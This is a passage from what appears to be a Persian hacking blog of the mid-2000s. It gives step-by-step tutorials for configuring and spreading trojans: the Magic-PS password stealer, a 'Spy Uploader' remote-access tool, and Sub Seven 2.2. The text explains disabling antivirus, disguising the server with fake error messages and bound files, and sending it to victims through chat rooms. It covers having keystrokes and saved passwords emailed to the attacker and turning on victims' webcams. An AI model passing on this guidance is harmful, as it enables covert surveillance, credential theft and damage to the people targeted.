2-)قسمت دوم:
در اين قسمت با انتخاب گزينهFake Error Messageميتوانيد يك پيغام خطاي دروغين ايجاد كنيد كه پس از اجرا شدن فايل هك نمايش داده شود.در قسمتCaptionنيز ميتوانيد يك عنوان براي پيغام خود بگذاريد و در قسمتMessageميتوانيد يك خط متن و يا هر چيز ديگري براي نمايش دادن پيغام در آن بنويسيد.ضمنا گزينهTestهم براي امتحان كردن پيغام خطاي شما است.

3-)قسمت سوم(Your Yahoo! ID that logged pass send to it):
در اين قسمت بايدIDكسي را وارد كنيد كه ميخواهيدPasswordوUserNameو اطلاعات ديگر شخص هك شونده به آنIDفرستاده شود كه آنIDقطعا بايد آي دي هكر يعني خودتان باشد.

4-)قسمت چهارمChoose Icon(only for .exe and .scr):
در اين قسمت بهتر است كه شما يك Icon براي فيال خود انتخاب كنيد.5

5-)قسمت پنجم:
در اين قسمت با انتخاب كردن گزينهBinderميتوانيد يك فايل مثلا عكس يا يك فايل اجرايي و يا هر چيز ديگر به فايل هك خود ضميمه كنيد.اين كار براي جلوگيري از شك و ترديد فرد هك شونده ميباشد.6

6-)قسمت ششمMPS Creator:
در اين قسمت نام فايل خودتان را انتخاب كنيد سپس بر روي گزينهCreat MPS كليك كنيد تا فايل شما ايجاد شود.در ضمن زماني كه شما انتخابهاي مورد نظر خود را انجام داديد بايد بر روي گزينهCreat MPSو سپسExitكليك كنيد و فايل ايجاد شده را براي شخص مورد نظر بفرستيد تا او آن را اجرا كند.البته هك روشهاي مختلف ديگري هم داره كه من فقط به هك با نرم افزارMagic-PSاشاره شد
__________________
نوشته شده توسط هومن (مدیر وبلاگ) در چهارشنبه 1385/09/15 ساعت 13:56 | لینک ثابت |
Spy Uploader
ورژن : 1.0

توضیحات :
• حجم بسیار کم سرور تروجان.
• قابلیت دریافت اطلاعاتی‌ از سیستم مقابل و ارسال آنها برای شما.
• قابلیت مشخص کردن فولدر مقصد در سیستم شخص مقابل برای آپلود و انتقال فایل.
• قابلیت شناسایی‌ فولدر ویندوز و یا فولدر سیستم جاری کامپیوتر مقابل برای انتقال فایل به آنها.
• امکان اجرای فایل بعد از آپلود و انتقال کامل آن.
• قابلیت حذف سرور و غیر فعال کردن آن بعد از اتمام کار در سیستم مقابل.
• امکانات دیگر ....

نحوه استفاده :این برنامه محتوی یک فایل ایجاد کننده سرور به نام Creator و یک فایل اصلی‌ کلاینت به نام Spy Uploader است.

به وسیله فایل Creator شما میتوانید سرور این برنامه را با تنظیمات دلخواه خود ایجاد کنید. بعد از تنظیمات دلخواه در Creator کافیست بر روی دکمه Create کلیک کنید تا فایل Server در فولدر و پوشه جاری برنامه ساخته شود. حال فقط کافیست این فایل را برای فرد مورد نظر ارسال کنید.

به وسیله فایل اصلی Spy Uploader‌ شما میتوانید به سرور در کامپیوتر مقابل متصل و فایل های دلخواه خود را بر روی آن سیستم آپلود، اجرا و یا حذف کنید.

در عکس بالا پنجره اصلی‌ برنامه را میتوانید ملاحظه کنید که شامل قسمت های زیر است :

IP : در این قسمت آیپی‌ کامپیوتر مقابل را وارد نمایید.
Port : در این قسمت شماره پرتی‌ را که زمان ساخت سرور وارد کردید وارد نمایید.
Connect : بعد از مشخص کردن آیپی‌ و پرت کافیست بر روی این دکمه کلیک کنید تا به کامپیوتر فرد مقابل متصل شوید.
Get informations : در این قسمت میتوانید اطلاعاتی‌ مفید و مقدماتی‌ از قبیل نام کامپیوتر ، نام کاربری ، نام وارد شده زمان ساختن سرور و آدرس سرور را ملاحظه نمایید.
Run file : در این قسمت میتوانید با وارد کردن آدرس یک فایل در کامپیوتر مقابل آن فایل را اجرا کنید.
Delete file : در این قسمت میتوانید با وارد کردن آدرس یک فایل در کامپیوتر مقابل آن فایل را حذف کنید.
Remove server : با کلیک بر روی این دکمه و تایید شما سرور در کامپیوتر مقابل بسته و خود را از Startup سیستم حذف میکند. بنابراین فقط در صورت لزوم از این گزینه استفاده کنید تا سرور در سیستم مقابل غیر فعال شود.

File to send : در این قسمت فایل دلخواه خود که مایلید به سیستم مقابل آپلود کنید را انتخاب نمایید.
Save file to : در این قسمت آدرس مورد نظر در کامپیوتر مقابل را وارد نمایید تا فایل به آن فولدر آپلود شود، به وسیله دو دکمه Get system dir و Get windows dir میتوانید پوشه ویندوز و سیستم را در کامپیوتر مقابل به دست اورید و در صورت لزوم فایل را به انها آپلود و منتقل کنید. دقت کنید که در این بخش باید بعد از آدرس فولدر مورد نظر نام فایل را هم مشخص کنید مانند: C:\File.exe
Run file after upload : با انتخاب این گزینه بعد از آپلود فایل به کامپیوتر مقابل آن فایل اجرا میشود.
Upload : با کلیک بر روی این دکمه آپلود فایل به کامپیوتر مقابل آغاز میشود، بعد از اتمام آپلود شما با پیغام File upload successful در پایین برنامه و قسمت Status مواجه میشوید.

دانلود

نوشته شده توسط هومن (مدیر وبلاگ) در چهارشنبه 1385/09/15 ساعت 13:53 | لینک ثابت |
hooman

دانلود

انواع هکرها


1. New bie : به هکرهای مبتدی گفته می شود .
2. Lammer : به New bie های پرمدعا گفته می شود .
3. Black Hats : با Crackers از آنها یاد می شود ، اینگونه افراد به اطلاعات و سیستم های رایانه ای از قبیل سیستم های امنیتی بانک ها ، سایتهای اینترنتی و همچنین سیستم های خانگی Client ها آسیب می رسانند و هیچگونه پایبندی به موازین اخلاقی و قانونی ندارند .
4. White Hats : از آنها به عنوان شوالی های دنیای هک یاد می شود ، اینگونه افراد از دانش خود در راه درست استفاده می کنند و معمولا به عنوان مشاوران امنیتی ، مدیران سیستم های رایانه ای و برنامه نویسان مشغول به فعالیت هستند و هیچگونه ضرر و زیانی به سیستم های رایانه ای نمی رسانند و در حقیقت نقش Helper را ایفا می کنند و به کمک مردم می پردازند و دانش خود را در اختیار همگان می گذارند ... .
5. Gray Hats : از آن ها به عنوان مرز میان دسته سوم و چهارم هکرها یاد می شود ، بدینصورت که اینگونه افراد هم به عنوان Cracker و هم به عنوان Helper در دنیای هک نقش ایفا می کنند . یعنی بدینصورت که هم به سیستم های رایانه ای ضرر می رسانند و هم به عنوان مشاوران امنیتی به مردم کمک می رسانند .

تعریف چند اصطلاح - Dofinitions Of Expressions
Ping : جهت فرستادن data به كار مي رود و محاسبه سرعت رفت و برگشت و موارد دسترسي را Ping كردن گونيد .
Whoise : پيدا كردن IP و رديابي مكاني آنرا گونيد .
Server.exe : يك فايل اجرائي است كه كلا در نرم افزار Sub Seven پايه و اساس ورود به سيستم هاي رايانه اي به و جود اين فايل اجرائي بنا شده ، نه تنها نرم افزار Sub Seven بلكه تمامي نرم افزارهائي كه مانند ساب سون احتياج به يك فايل اجرائي Server.exe دارند . در حقيقت فرد هك كننده يا هكر يك فايل اجرائي Server.exe كه حال مي تواند به هر اسمي دلخواه باشد را از طرق مختلف كه بعدا در مورد آن توضيح داده خواهد شد براي شخصي در اينترنت ارسال مي كند و هنگاميكه آن فرد Server.exe را اجرا كند فقط با يك كليك ماووس ، شخص هكر مي تواند توسط فايل Client كه توضيحات بيشتر نيز در مورد اين فايل بعدا گفته خواهد شد ، امكان ارتباط با كامپيوتر شخص هك شده را خواهد يافت و مي تواند به طور كلي بر كامپيوتر فرد هك شونده در زماني خيلي كم كنترل پيدا كند .
: Victimبه كامپيوتري اطلاق مي شود كه فايل اجرائي Server.exe روي آن اجرا شود در اصل يعني كامپيوتر قرباني و هك شونده .
: Subبه معني تحت ، تابع ، مادون ،‌ فرع ، جاي كسي را گرفتن و جايگزين كردن مي باشد .
IP/TCP : مخفف Internet Protocol مي باشد و يكي از پروتكل هاي مورد استفاده در اينترنت مي باشد .
Port : مقاديري مجازي هستند كه در ارتباطات مبتني بر TCP/IP كاربرد دارند و برنامه هاي شبكه از طريق آن ها به سرويس هاي مختلف دست مي يابند ، محدوده Port ها بين صفر تا 65535 مي باشد كه از شماره صفر تا 1023 رزرو شده مي باشد . مثلا سرويس http كه به منظور مشاهده صفحات web به كار مي رود روي Port شماره 80 فعال است . در حقيقت در دنياي هك Sub Seven ، كامپيوتر خانه اصلي اينترنتي مورد نظر مي باشد . IP آدرس اينترنتي اين خانه مورد نظر مي باشد .Port درب هاي ورودي به اين خانه مي باشد Server.exe در اين خانه وظيفه جاسوسي به صورت يك دوربين مخفي و مدار بسته را ايفا مي كند . شخص هكر براي جاسوسي به كامپيوتر قرباني با ارسال يك فايل اجرائي حمله ور شده ابتد امي بايست آدرس اين خانه يا كامپيوتر قرباني رو بدست بياورد كه خانه اصلي ID شخص مورد نظر مي باشد مانند Yahoo ID و حال هكر احتياج به آدرس دارد كه IP آدرس اين خانه يا کامپيوتر مي باشد كه از چند كاركتر بصورت عدد تشكيل شده مانند مثال : 216.156.98.42 كه اين اعداد از 0 تا 256 متغيرند و در هر بار متصل شدن به اينترنت اين اعداد تغيير پيدا مي كند و اين IP ها از سوي ISP هائي كه Account در اختيار User كاربر مي گذارند اختصاص داده مي شود و هر ISP براي خود IP مخصوصي دارد و تعدادي IP در اختيار دارد كه به Userها اختصاص مي دهد . حال هكر احتياج به اين دارد كه بداند چه درب هائي براي ورود به اين خانه وجود دارد كه در اصطلاح Port تلقي مي شود و پورت ها از عدد 0 تا 65535 متغيرند كه در ويندوزهاي 98 براحتي مي توان وارد اين سيستم عامل ها شد ولي در ويندوزهاي XP به دلايل امنيت فايروالي و حفاظت اكثر پورت هاي فعال كه اين مزيت را اين سيستم عامل ها دارند نمي توان براحتي وارد شد و به سختي اين كار امكان پذير است . حال شخص هكر احتياج به يك دوربين مخفي و مدار بسته دارد كه از آن بعنوان فايل اجرائي Server.exe ياد مي شود كه با كنترل بر اين فايل اجرائي شخص هكر مي تواند بر تمامي حركات افراد داخل خانه يا همان كامپيوتر قرباني هك شده Victim تسلط پيدا كند . و در آخر اين كه يك پست الكترونيكي E-mail واقع در سايت هات ميل Hotmail احتياج است كه تمامي اعمال ضبط شده بوسيله فايل اجرائي Server.exe اعم از بدست آوردن IP ، Port و تمامي پسوردهاي Save شده در كامپيوتر Victim و …….. با هربار وصل شدن كامپيوتر قرباني ويكتيم به اينترنت با فرستادن يك نامه الكترونيكي مايلmail ساده از سوي شخصي نامعلوم از سايت هات ميل Hotmail به پست الكترونيكي E-mail شخص هكر ، وي را از دانستن IP-Port با خبر می سازد.
آماده سازي فايل اجرائي Server.exe ؛ تذكر : ابتدا مي بايست نرم افزارهاي ويروس ياب خود را به دليل اينكه همين فايل اجرائي Server.exe نوعي ويروس تروجان تلقي مي شود از کار انداخت يا غيرفعال كرد . براي استفاده از Sub seven ابتدا بايد فايل اجرائي Server.exe را بطور كامل بشناسيم و طراحي اش كنيم . پس از بازكردن پوشه Sub seven سه فايل اجرائي exe.* براي ما قابل يافت مي باشد . اولين آن فايل Server.exe مي باشد كه بايد براي شخصي در اينترنت فرستاده شود كه اين فايل اجرائي قابليت كمي دارد ، پس براي تنظيم و افزايش قابليت بايد از فايل اجرائي Editserver.exe استفاده شود و پس از تنظيم براي شخصي در اينترنت به طرق مختلف فرستاده شود . برنامه Client براي برقراري ارتباط با Server استفاده مي شود . همانگونه كه قبلا گفته شد نياز به يك فايل اجرائي بنام Server.exe داريم كه بايد روي Victim اجرا شود ، بدين منظور در پوشه Sub Seven برنامه Editserver را انتخاب كرده ، در پنجره باز شده دو گزينه وجود دارد :
run inadvance mode - run innormal mode
run inadvance mode : كه قسمت اول براي كاربران حرفه اي است پس بهتر است كه شما گزينه دوم را انتخاب كنيد .
run innormal mode : حال اين گزينه را انتخاب كنيد صفحه Editserver پس از انتخاب باز مي شود كه داراي 8 گزينه و صفحه
مي باشد . گزینه server seting : پس از انتخاب اين گزينه در صفحه آن قسمت هاي مختلفي ظاهر مي شود كه مرور مي كنيم .
Port : اين گزينه شماره درگاهي است كه توسط آن با فايل Server.exe خود ارتباط برقرار مي كنيد .
تذكر : از انتخاب Port هاي 0 تا 1023 خودداري كنيد چون رزور شده است و بعنوان مثال یا پورتی را که خود برنامه انتخاب کرده و یا اینکه از Port شماره 30000 به بعد پورت هاي مورد نظر خويش را انتخاب كنيد .
Password : اين گزينه براي حفاظت از Server به كار مي رود به طوري كه فرد ديگري نتواند با Server ي كه شما ايجاد كرده ايد ارتباط برقرار كند مزيت آن اين است كه اگر هكر ديگري به Victim راه پيدا كند بدون Password نمي تواند از Server شما استفاده كند re-enterpassword : اين گزينه جهت جلوگيري از اشتباه به هنگام وارد كردن Password به كار مي رود .
آموزش Sub Seven 2.2 (قسمت دوم)

آموزش Sub Seven 2.2 (قسمت دوم)

Victim name : اين گزينه نام كامپيوتري است كه شما فايل Server.exe را براي آن ارسال مي كنيد و هر اسمي مي تواند باشد .
portec password : با انتخاب اين گزينه براي حفاظت از تغيير توانائي هايServer بعد از ارسال آن يك Password دروني برايServer مي گذاريم كه براي تغيير دادن تنظيمات مي باشد .
re-enterpassword : اين گزينه جهت جلوگيري از اشتباه به هنگام وارد كردن Password به كار مي رود .
use random port : با انتخاب اين گزينه هر باري كه Victim به اينترنت متصل مي شود Server به صورت تصادفي يك شماره Port را به Victim اختصاص مي دهد و پيشنهاد مي شود كه اين گزينه را فعال نكنيد ،چون با تعیین Server , Password محافظت مي شود.
melt server after installation : با انتخاب اين گزينه Server بعد از جدا شدن بر روي Victim خود را ناپديد مي كند ، بدين ترتيب عين اجراي عمليات خود براي هيچكس قابل ديدن نيست . در اصل شما مي توانيد با انتخاب كردن اين گزينه فايل Server.exe را بعد از اجرا شدن به حالت Hidden يا مخفي در بياوريد تا كسي از هويت اصلي آن با خبر نشود و بصورت مخفيانه عمليات محوله به خويش را انجام دهد .
wait for reboot : با انتخاب اين گزينه Server تا زمان راه اندازي مجدد Victim توانائي انجام وظايف محوله خويش را نخواهد داشت ، اگر اين گزينه را فعال كنيم باعث مي شود كه Server تا زماني كه Reset نشود فعاليت خود را آغاز نكند .
تذكر : بديهي است از انتخاب كردن گزينه فوق صرف نظر شود .
server filename : با انتخاب اين گزينه Server در هر بار اتصال به اينترنت به صورت تصادفي يك نام جداگانه را به Victim اختصاص مي دهد .
specify : با انتخاب اين گزينه Server به صورت دائمي نامي را به Victim اختصاص مي دهد و شما مي توانيد با انتخاب كردن اين گزينه يك نام دائمي براي Victim خود داشته باشيد كه مي توانيد همان اسمي رو كه قبلا به victim name خود اختصاص داده ايد را در اين جا انتخاب كنيد .
گزينهstartup methods : صفحه اصلي آن گزينه هائي مربوط به محل ذخيره سازي Server و نام Server به هنگام بالا آمدن و برخي گزينه هاي ديگر مي شود كه توصيه مي شود اين گزينه ها ( تنظيمات آن ها ) را به هيچ عنوان تغيير ندهيد .
گزینه notifications : اين گزينه به ترتيب مراحل زير فايل Server.exe را بسيار قدرتمند مي سازد .
add ICQ notify : با انتخاب اين گزينه اطلاعاتي در مورد Server شما شامل شماره Port و ….. را به ICQ شما ارسال مي كند كه اين گزينه مدنظر ما نمي باشد ولیکن اگر ICQ دارید حتما استفاده نمائید چون به تجربه ثابت کرده که خوب کار می کند .

add e-mail notify : با انتخاب اين گزينه اطلاعاتي در مورد Server شما شامل شماره Port و ….. را به e-mail شما در سايت هات ميل ارسال مي كند كه در اصل اين گزينه مدنظر ما مي باشد .
تذكر : توجه داشته باشيد كه حتما بايد e-mail انتخابي شما از سايت هات ميل باشد ، زيرا فايل Server.exe در فرستادن مايل به سايت هاي ديگر مانند سايت Yahoo مشكل دارد و در سايت هات ميل به راحتي مي تواند مايلي از سوي كامپيوتر Victim در هر بار اتصال Victim به اينترنت حاوي اطلاعات خواسته شده از سوي شما از قبيل شماره IP ، Port ، كليه Password های save شده و ….. را ارسال كند . در ضمن هر جائي كه از شما e-mail خواشته شده سعي كنيد يك e-mail بدهيد يعني در حقيقت e-mail انتخابي شما در هر گزينه كه خواسته شده يكي باشد و متغير نباشد .
add IRC notify : با انتخاب اين گزينه اطلاعاتي در مورد Server شما شامل شماره Port و ….. را به IRC شما ارسال مي كند كه اين گزينه مدنظر ما نمي باشد .
add SIN notify : اين گزينه به دليل كاربرد محدودي كه دارد توضيح داده نمي شود .
add CGI notify : اين گزينه به دليل كاربرد محدودي كه دارد توضيح داده نمي شود .
more info : اين گزينه به منظور ارائه توضيحات بيشتر در رابطه با پنج گزينه بالا به كار مي رود دراصل Help گزينه هاي بالا حساب مي شود .
current notifications: يك كادر آبي رنگ است كه پس از ايجاد يك notifications آن را درون اين جعبه ليست مشاهده خواهيد كرد كه به منظور پاك كردن آن كافي است روي آن دوبار كليك كنيد .
گزينه binded files : در حقيقت صفحه اصلي اين گزينه اهميت زيادي دارند ، بدينصورت كه مي توان فايلهاي اجرائي و استخراجي را به Server طراحي شده خويش الصاق كرده و بابت اين است كه دريافت كننده Server يعني شخص هك شده متوجه اصل هويت فايل Server.exe نشود . كه اگر اين فايلهاي اجرائي يا استخراجي كه شما از هارد خويش انتخاب مي كنيد به فايل اصلي Server.exe الصاق شود به محض اجراي Server آن فايلها هم اجرا مي شوند . عزيت اين كار اين است كه مي توان فايل اصلي Server.exe را با يك فايل اجرائي ، مثلا : فايلهاي صوتي و تصويري الصاق كرده و هويت اصلي آن Hidden يا مخفي شود و همچنين اگر فايل اصلي Server.exe را با فايلهاي استخراجي الصاق كنيد ، پس از اجراي Server فايلهاي استخراجي جدا شده و در همان محل نمايان مي شوند . تذكر : در اين جا فايلهاي اجرائي همان فايلهاي صوتي يا تصويري mp3.* و … مي باشد و فايلهاي استخراجي همان فايلهاي txt.*مي باشد و به صورت يك متن دلخواه مي تواند باشد .
با انتخاب كردن كيد add web plugin شما مي توانيد plugim هائي از اينترنت دريافت كرده و بدون اينكه شخص هك شده متوجه شود با هر بار برقراري ارتباط با Server در كامپيوتر Victim ، پلاگينهائي از اينترنت , خوده Server دانلود كرده و روي Victim نصب مي نمايد . تذكر : براي اين كار مي بايست آدرس معتبري را در قسمت خواسته شده وارد كنيد كه هر بار Victim به اينترنت وصل مي شود plugin هاي مدنظر بر روي Victim بوسيله Server كار گذاشته شود كه با وجود plugin هاي موجود در پوشه Sub Seven احتياجي به فعال كردن اين گزينه نيست .

گزینه restrictions : از اين قسمت براي محدود كردن عملكرد Server استفاده مي شود . با فعال كردن گزينه enable filter و فشردن كليد add allowed feature مي توان دستوراتي را كه در نظر داريد توسط Server اجرا شود را انتخاب كنيد ، كه اين دستوارت نيز در قسمت Clinet وجود دارد .

__________________
آموزش Sub Seven 2.2 (قسمت سوم)
و اما معرفي چند دستور از هفتاد دستوري كه در قسمت all allowed feature …. وجود دارد :
تذكر : تمامي اين دستورات بدون اينكه شخص هك شده متوجه شود در سيستم Victim مي توان انجام گرفت .... !

server option ها : دستورات اختیارات در Server
server options . update server : دستور جایگزین کردن Server جدید .
server options . restar server : دستور ريست كردن و از كار انداختن عمليات محوله به Server .
server options . close server : دستور بستن و از كار انداختن موقت عمليات محوله به Server .
server options . remove server : دستور پاك كردن كامل Server از سيستم Victim .
server options . change password : دستور تغيير دادن پسورد Server .
server options . change victim name : دستور تغییر نام Victim .
server options . change port : دستور تغيير شماره Port داده شده به Server و ... .
file manager ها : دستورات مديريت فايل هاي Victim بوسيله Server :
file manager . rename file : دستور تغيير نام فايلها در هارد دیسک Victim .
file manager .download file : دستور دانلود كردن كامل هر فايل دلخواهي از سيستم Victim .
file manager . play wav file : دستور فعال کردن فایلهای صوتی و اجرا كردن فایلهائی با فرمت wav در سيستم Victim .
file manager . change wallpaper : دستور تغيير وال پيپر صفحه دكستاپ سيستم Victim .
file manager . delet files : دستور پاك كردن كامل فايل ها از سيستم Victim .
file manager . delet folders : دستور پاك كردن كامل شاخه ها يا پوشه ها از سيستم Victim .
file manager . make folders : دستور ساختن شاخه ها يا پوشه ها در سيستم Victim .
capture ها : دستورات دستگيري ، اسير كردن و تسخير كردن كامل Victim بوسیله Server :
capture . mouse clicks : دستور تغيير دگمه هاي كليك راست و چپ ماووس .
capture . webcam capture : دستور فعال كردن وب كم شخص هك شده در سيستم Victim .
fun ها : دستورات شوخي كردن با شخص هك شده :
fun1 . show picture : دستور ديدن عكسي كه شخص هك شده مشاهده مي كند .
fun1 . print text : دستور چاپ يك متن دلخواه بوسيله چاپگر Victim .
fun2 . change resolution : دستور تغيير وضوح و تحليل تصاوير Victim .
fun2 . change window color : دستور تغيير رنگهاي Appearance سيستم عامل ويندوز Victim در قسمت .Display Properties
fun2 . restart computer : دستور ري استارت كردن كامپيوتر Victim .
password ها : دستورات بدست . Victimآوردن پسوردهای Save شده يا تغيير آن هادر سیستم
passwords . screen saver : دستور بدست آوردن پسورد Save شده محافظ صفحه نمايش ويندوز Victim .
passwords . e - mailing password : دستور بدست آوردن پسورد e-mail شخص هك شده در Victim .
passwords . ICQ : دستور بدست آوردن پسوردهاي حساب هاي ICQ .
passwords .cached : دستور بدست آوردن پسوردهای Save شده در Victim .
passwords . recorded : دستور بدست آوردن پسوردهائي كه در حال ثبت و ضبط است در Victim .
و ……… كه خيلي از اين دستورات در اينجا بنا به سادگي ، از گفتن آنها پرهيز مي شود .
گزينه add manual command با اينكه براي كاربران حرفه اي است وليكن در اينجا كاربرد چنداني ندارد ، چرا كه از گزينه قبلي براي طراحي دستورات لازم استفاده شده است و اين گزينه مدنظر ما نمي باشد ولي مي توان به يك دستور براي طراحي ستورات لازم كاربران حرفه اي اشاره كرد ؛ دستور +++HTL : اين دستور براي از كار انداختن Modem به كار مي رود و با از كار انداختن پياپي موجب سوختن Modem و از كار افتادن دائم اين قطعه سخت افزاري مهم براي متصل شدن به اينترنت مي شود . با فشردن كليد delete مي توان دستورات انتخاب شده رو كه كاربردي براي ما ندارد را از ليست مذكور حذف كرد ... .

گزینه e-mail all pressed key to : اين گزينه به Server اختيار مي دهد كه ليست تمامي كليدهائي كه فشرده شده است را به آدرس پست الكترونيكي e-mail شما در سايت هات ميل بصورت يك مايل نامه الكترونيكي ارسال كند ، كمااينكه اجراي این قسمت نیاز به key plugin دارد .
e-mail all password to : اين گزينه به Server اختيار مي دهد كه ليست تمام پسوردهاي سيو شده Victim را به آدرس پست الكترونيكي e-mail شما در سايت هات ميل بصورت يك مايل نامه الكترونيكي ارسال كند ، كمااينكه اجراي اين قسمت نياز به password pluginدارد .
e-mail recorded password to : اين گزينه به Server اختيار مي دهد كه ليست تمام پسوردهاي اينترنتي سيو شده Victim را به آدرس پست الكترونيكي e-mail شما در سايت هات ميل بصورت يك مايل نامه الكترونيكي ارسال كند ، كمااينكه اين قسمت نياز به password plugin دارد .
تذكر : با فعال كردن قسمت اول و وارد كردن e-mail خود در جعبه متن اين قسمت Server موظف به فرستادن كليدهاي فشرده شده تا قبل از اتصال به اينترنت مي شود و دو گزينه بعدي Server را موظف به فرستادن تمامي ليست شامل Password هاي Save شده پس از اتصال به اینترنت به e-mail شما مي شود .

آموزش Sub Seven 2.2 (قسمت چهارم)

exe icon / otherگزینه
configure error message
enable fake error message : با فعال كردن اين گزينه ، هنگاميكه Server روي Victim اجرا مي شود . يك پيغام جعلي جهت رد گم كردن به نمايش در مي آيد . با انتخاب اين گزينه براي اينكه پيغام جعلي نمايش داده شود ، ابتدا يك icon اخطارآميز از ميان icon هاي موجود انتخاب كرده كه در سمت چپ پيغام ظاهر مي شود. در مرحله بعد كليدهائي را كه مي خواهيم در حقيقت پاسخ سئوال error طرح شده از سوي ما باشد در پيغام جعلي جايگزين مي كنيم و از قسمت buttons آنها را انتخاب كرده جايگزين مي كنيم . حال در مرحله آخر مي بايست متن پيغام رو نسبت به سليقه خود ويرايش كرد كه موضوع اين پيغام جعلي را در قسمت : title و نوع متن را در قسمت : text تايپ مي كنيم . حال براي اينكه يك بار تست بكنيد كه پيغامتان با icon انتخابي شما و همچنين متن مورد نظر شما به چه صورت ويرايش شده كافيست يك بار كليد test message را فشار دهيد تا پيغام جعلي شما با ويرايشي كه انجام داده ايد نمايان شود . هم اكنون نوبت به Save كردن اين پيغام جعلي رسيده كه شما ميتوانید با کلیک بر روی ok آن را ذخيره نمائيد
[download from web : for more infohit ' add file ' and ' help ] : از اين مجموعه براي دريافت فايل از اينترنت استفاده مي شود كه به دليل كاربرد كم اين گزينه ها از توضيح آن اجتناب مي شود .
change server icon : با استفاده از اين مجموعه مي توان شكل ظاهري فايل Server را با الصاق كردن چند عكس تغيير داد .
حال اين سئوال به ذهن شما خطور مي كند : با وجود پيغام جعلي error ، الصاق عكس چه فايده اي دارد ؟
پاسخ : الصاق كردن فايل اجرائي به صورت تصوير يا …. حتي يك متني ساده مي تواند هويت فايل Server را تغيير دهد ، بدين صورت كه وقتي شخص هك شده اين فايل را اجرا نمايد اگر ما گزينه بالائي را فعال نكرده باشيم ، منظور همان گزينه اي كه پيغام جعلي را مي سازد enable fake error messag : ، حال با اضافه كردن يك يا چند عكس به فايل Server وقتي شخص هك شده فايل Server را اجرا نمايد اكنون به جاي error يا فرمان جعلي عكس ها ظاهر مي شوند . ولي در حقيقت اين عكس ها فقط براي رد گم كردن هست و در اصل فايل Server هنوز باقي است .
توجه : با انجام دادن اين كار تا حدودي از شناسائي فايل Server جلوگيري مي شود و شك فرد هك شده به شما كم مي شود .
ابتدا گزينه change server icon را فعال كرده و در قسمت پائين يك icon از ميان 208 ، icon موجود انتخاب كرده و شكل ظاهري آن نيز در گوشه پائيني سمت راست صفحه ظاهر مي شود در قسمت exe icon : ، اگر icon مورد نظر شما در اين صفحه وجود نداشت مي توان با فشردن كليد load from file ، آيكون مورد نظر خود را از روي hard disk بارگذاري كرد . كليد default icons شكل ظاهري icon انتخابي را به شكل اوليه باز مي گرداند . اكنون مرحله آخر براي طراحي Server خود رسيده . بر روي كليد save as كليك كرده و محل يا paht ي كه مي خواهيد فايل اجرائي Server.exe در آنجا ذخيره شود را انتخاب مي كنيد و سپس در قسمت File name : نام Server خويش را انتخاب كرده يا به همين اسم يا به هر اسم دلخواهي كه خودتان در نظر داريد و در قسمت Save as type : پسوند exe را انتخاب مي كنيد البته مي توانيد all files كرده و هر پسوندي كه دلتان خواست رو انتخاب كنيد ولي در اين جا پسوند exe مدنظر ما مي باشد و بايد با پسوند exe باشد . به عنوام مثال مي توانيد نام Server خود را ali.exe و ….. بگذاريد . حال Server شما آماده ارسال از طرق مختلف مي باشد . پس از آماده سازي Server نوبت ارسال آن فرا مي رسد . طبق آزمايشات و تحقيقات انجام شده ، بهترين روش براي فرستادن Server استفاده از اتاق هاي گفتگو مانند chat room ها و در حالت كلي استفاده از پيغام رسان هاي اينترنتي مانند yahoo messenger مي باشد .
چناچه مثلا شما در حال chat با دوست خود يا Victim در سايت yahoo هستيد ، يا در يك اتاق گفتگو يعني همان room ها حضور داريد مي توانيد از طريق گزينه send file فايل Server خود را به شخص مورد نظر ارسال داريد . بعد از دانلود كردن اين فايل و اجراي Server از طرف فرد هك شونده روي کامپیوتر Victim ، تمام notifization هائي كه هنگام طراحي Server ايجاد كرده ايد مانند : add e-mail notify اطلاعات مورد نياز را به آدرس پست الكترونيكي e-mail شما واقع در سايت هات ميل ارسال مي كند . حال براي ارتباط با Server نياز به دانستن اين اطلاعات داريد : از جمله شماره IP و Port و ……. . پس به صندوق پستي الكترونيكي خود واقع در سايت هات ميل رفته و e-mail فوق الذكر را چك مايل كنيد . حال مشاهده مي كنيد كه اين مايل يا نامه الكترونيكي از طرف شخصي نامعلوم در سايت هات ميل ارسال شده . به نام فرستنده و عنوان نامه توجهي نكرده و آن را باز كنيد . البته ناگفته نماند اكثرا نامه ها بدون عنوان مي آيند none . حال از ميان اطلاعات دريافت شده بوسيله اين مايل شماره IP و Port و شماره Password را يادداشت كرده و سپس فايل اجرائي client.exe را از پوشه Sub Seven انتخاب كرده و اجرا كنيد .
تذكر : به علت سادگي بعضي از گزينه هاي برنامه Client از گفتن آنها اجتناب مي شود و جستجو در مورد آنها با خود شماست و ما در اينجا گزينه هاي اساسي و مهم را توضيح مي دهيم .
بعد از اجراي برنامه client بايد IP را در قسمت destination : و Port را در قسمت port : وارد كنيد و روي connect كليك كنيد ، اگر در طراحي Server پسوردي براي Server گذاشته باشيد حال آن را بايد در قسمتي كه ظاهر مي شود و از شما پسورد را مي خواهد وارد كنيد . اگر در قسمت Status bar عبارت windows list received ظاهر شود به منزله ارتباط شما با Server مي باشد. در سمت چپ برنامه Client نه انتخاب براي شما وجود دارد كه با انتخاب گزينه conection اطلاعاتي راجع Victim بدست مي آوريد.
گزينه pc info : با انتخاب اين گزينه مجموعه اطلاعاتي را نسبت به طرف مقابل به شما مي دهد و در قسمت more pc info اطلاعات بيشتري را نسبت به pc ifno در اختيار شما قرار مي دهد . در قسمت server option مي توانيم اطلاعات بيشتري مربوط به Server را ويرايش كنيم يا تغييردهيم بدينصورت كه گزينه change port : با انتخاب اين گزينه مي توان Port قبلي را تغيير داد كه هنگام برقراري ارتباط با Victim بايد Port جديد را وارد كرد .
گزينه remove server : با انتخاب اين گزينه ميتوان Server را در كامپيوتر Victim از بين برد و اگر بخواهيم مجددا با Victim ارتباط برقرار کنیم باید Server ديگري بفرستيم .
گزينه set password : با انتخاب اين گزينه مي توان Password جديدي براي Server انتخاب كرد .
گزينه remove password : با انتخاب اين گزينه مي توان Password را پاك كرده كه هيچ وقت نيازي به آن نباشد و با هر بار وصل شدن به Victim و وارد كردن IP و Port جديد پسورد را از ما نخواهد و همچنين در مراحل ديگر .
گزينه close server : با انتخاب اين گزينه مي توان ارتباط خود را با Server قطع كرد .
گزينه restart server : با انتخاب اين گزينه مي توان مجددا ارتباط خود را با Server برقرار كرد .
گزينه update server from file : با انتخاب اين گزينه مي توان فايل Server خود را به روز كرد .
گزينه scanner به ما امكان مي دهد IP و Port هاي جديد را Search كرد .
با انتخاب گزينه keys / message و سپس در قسمت keyboard شما مي توانيد پنج انتخاب داشته باشيد .
